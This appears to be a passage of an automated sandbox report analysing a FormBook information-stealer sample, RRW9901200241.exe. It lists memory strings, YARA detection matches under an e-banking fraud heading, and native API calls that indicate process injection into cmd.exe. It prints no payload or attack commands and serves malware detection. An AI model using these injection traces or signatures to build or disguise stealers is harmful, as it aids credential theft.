61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.346593091.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: cmd.exe, 00000004.00000002.679859333.0000000003A2F000.00000004.00000001.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419D50 NtCreateFile,2_2_00419D50
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419E00 NtReadFile,2_2_00419E00
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419E80 NtClose,2_2_00419E80
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419F30 NtAllocateVirtualMemory,2_2_00419F30
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419E4C NtReadFile,2_2_00419E4C
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419F2E NtAllocateVirtualMemory,2_2_00419F2E
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01539910
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015399A0 NtCreateSection,LdrInitializeThunk,2_2_015399A0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539840 NtDelayExecution,LdrInitializeThunk,2_2_01539840
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01539860
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015398F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_015398F0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A50 NtCreateFile,LdrInitializeThunk,2_2_01539A50
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01539A00
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A20 NtResumeThread,LdrInitializeThunk,2_2_01539A20
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539540 NtReadFile,LdrInitializeThunk,2_2_01539540
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015395D0 NtClose,LdrInitializeThunk,2_2_015395D0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539710 NtQueryInformationToken,LdrInitializeThunk,2_2_01539710
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539780 NtMapViewOfSection,LdrInitializeThunk,2_2_01539780
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015397A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_015397A0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01539660
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015396E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_015396E0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539950 NtQueueApcThread,2_2_01539950
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015399D0 NtCreateProcessEx,2_2_015399D0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153B040 NtSuspendThread,2_2_0153B040
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539820 NtEnumerateKey,2_2_01539820
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015398A0 NtWriteVirtualMemory,2_2_015398A0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539B00 NtSetValueKey,2_2_01539B00
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153A3B0 NtGetContextThread,2_2_0153A3B0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A10 NtQuerySection,2_2_01539A10
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A80 NtOpenDirectoryObject,2_2_01539A80
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539560 NtWriteFile,2_2_01539560
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153AD30 NtSetContextThread,2_2_0153AD30
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539520 NtWaitForSingleObject,2_2_01539520
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015395F0 NtQueryInformationFile,2_2_015395F0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539770 NtSetInformationFile,2_2_01539770
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153A770 NtOpenThread,2_2_0153A770
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539760 NtOpenProcess,2_2_01539760
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153A710 NtOpenProcessToken,2_2_0153A710
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539730 NtQueryVirtualMemory,2_2_01539730
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539FE0 NtCreateMutant,2_2_01539FE0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539650 NtQueryValueKey,2_2_01539650
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539670 NtQueryInformationProcess,2_2_01539670
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539610 NtEnumerateValueKey,2_2_01539610
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015396D0 NtCreateKey,2_2_015396D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_002AB42E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,4_2_002A58A4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_002A84BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB4F8 NtQueryInformationToken,NtQueryInformationToken,4_2_002AB4F8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB4C0 NtQueryInformationToken,4_2_002AB4C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_002C6D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002CB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_002CB5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C9AB4 NtSetInformationFile,4_2_002C9AB4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,4_2_002A83F2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A50 NtCreateFile,LdrInitializeThunk,4_2_02FD9A50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_02FD9860
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9840 NtDelayExecution,LdrInitializeThunk,4_2_02FD9840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD99A0 NtCreateSection,LdrInitializeThunk,4_2_02FD99A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_02FD9910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02FD96E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD96D0 NtCreateKey,LdrInitializeThunk,4_2_02FD96D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9FE0 NtCreateMutant,LdrInitializeThunk,4_2_02FD9FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9780 NtMapViewOfSection,LdrInitializeThunk,4_2_02FD9780
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9710 NtQueryInformationToken,LdrInitializeThunk,4_2_02FD9710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD95D0 NtClose,LdrInitializeThunk,4_2_02FD95D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9540 NtReadFile,LdrInitializeThunk,4_2_02FD9540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A80 NtOpenDirectoryObject,4_2_02FD9A80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A20 NtResumeThread,4_2_02FD9A20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A10 NtQuerySection,4_2_02FD9A10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A00 NtProtectVirtualMemory,4_2_02FD9A00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDA3B0 NtGetContextThread,4_2_02FDA3B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9B00 NtSetValueKey,4_2_02FD9B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD98F0 NtReadVirtualMemory,4_2_02FD98F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD98A0 NtWriteVirtualMemory,4_2_02FD98A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDB040 NtSuspendThread,4_2_02FDB040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9820 NtEnumerateKey,4_2_02FD9820
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD99D0 NtCreateProcessEx,4_2_02FD99D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9950 NtQueueApcThread,4_2_02FD9950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9670 NtQueryInformationProcess,4_2_02FD9670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9660 NtAllocateVirtualMemory,4_2_02FD9660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9650 NtQueryValueKey,4_2_02FD9650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9610 NtEnumerateValueKey,4_2_02FD9610
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD97A0 NtUnmapViewOfSection,4_2_02FD97A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDA770 NtOpenThread,4_2_02FDA770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9770 NtSetInformationFile,4_2_02FD9770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9760 NtOpenProcess,4_2_02FD9760
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9730 NtQueryVirtualMemory,4_2_02FD9730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDA710 NtOpenProcessToken,4_2_02FDA710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD95F0 NtQueryInformationFile,4_2_02FD95F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9560 NtWriteFile,4_2_02FD9560
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDAD30 NtSetContextThread,4_2_02FDAD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9520 NtWaitForSingleObject,4_2_02FD9520
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,4_2_002B6550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,4_2_002B374E
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D8D8C90_2_00D8D8C9
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D8A8F10_2_00D8A8F1
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D960600_2_00D96060
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D955800_2_00D95580
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D9515C0_2_00D9515C
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D979310_2_00D97931
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D95AF00_2_00D95AF0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D967DC0_2_00D967DC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D903D20_2_00D903D2
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041D87D2_2_0041D87D
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041D9852_2_0041D985
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041DA2B2_2_0041DA2B
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041D4082_2_0041D408
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041DCF92_2_0041DCF9
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041D52D2_2_0041D52D
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00409E302_2_00409E30
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041E7452_2_0041E745
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041DFC52_2_0041DFC5
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CF932_2_0041CF93
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D8D8C92_2_00D8D8C9
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D8A8F12_2_00D8A8F1
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D960602_2_00D96060
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D9515C2_2_00D9515C
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D979312_2_00D97931
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D95AF02_2_00D95AF0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D903D22_2_00D903D2
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D955802_2_00D95580
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D967DC2_2_00D967DC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FF9002_2_014FF900
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015141202_2_01514120
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B10022_2_015B1002
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015CE8242_2_015CE824
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C28EC2_2_015C28EC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150B0902_2_0150B090
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015220A02_2_015220A0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C20A82_2_015C20A8
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C2B282_2_015C2B28
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BDBD22_2_015BDBD2
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152EBB02_2_0152EBB0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C22AE2_2_015C22AE
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C1D552_2_015C1D55
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C2D072_2_015C2D07
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F0D202_2_014F0D20
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C25DD2_2_015C25DD
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150D5E02_2_0150D5E0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015225812_2_01522581
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BD4662_2_015BD466
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150841F2_2_0150841F
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C1FF12_2_015C1FF1
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BD6162_2_015BD616
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01516E302_2_01516E30
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C2EF72_2_015C2EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AD8034_2_002AD803
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AE0404_2_002AE040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C5CEA4_2_002C5CEA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A48E64_2_002A48E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A9CF04_2_002A9CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C35064_2_002C3506
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B19694_2_002B1969
